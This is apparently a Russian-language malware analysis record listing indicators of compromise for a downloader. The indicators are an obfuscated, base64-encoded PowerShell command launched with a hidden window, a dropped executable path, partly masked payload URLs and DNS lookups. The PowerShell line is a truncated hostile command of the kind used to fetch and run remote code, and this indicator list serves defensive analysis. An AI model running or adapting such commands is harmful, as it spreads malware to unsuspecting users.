Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSADEAOQBiADQAaQA3AD0AKAAoACcAQwAnACsAJwA5AGQAOABzACcAKQArACcAMAA4ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAcgBwAFIAbwBGAGkATABlAFwAdQA1AEYAcwBVAH...
- %HOMEPATH%\u5fsuzm\jca0bkd\b1ckn1o.exe
- %HOMEPATH%\u5fsuzm\jca0bkd\b1ckn1o.exe
- %HOMEPATH%\u5fsuzm\jca0bkd\b1ckn1o.exe
- http://eb#.no/billett/VMs/
- http://fr####senbach.de/Meerbusch/igHfjN/
- http://ge##tax.de/assets/attach/rEzDDIkWAlZ/
- http://fr###roller.de/cgi-bin/attach/edFGzwpekjnwk/
- http://fo###oule.de/bba/file/TyfJoGH/
- http://gm##006.de/cgi-bin/file/fEyZ/
- DNS ASK eb#.no
- DNS ASK fr####senbach.de
- DNS ASK ge##tax.de
- DNS ASK ge####iasanchez.es
- DNS ASK fr###roller.de
- DNS ASK fo###oule.de
- DNS ASK gm##006.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSADEAOQBiADQAaQA3AD0AKAAoACcAQwAnACsAJwA5AGQAOABzACcAKQArACcAMAA4ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAcgBwAFIAbwBGAGkATABlAFwAdQA1AEYAcwBVAH...' (со скрытым окном)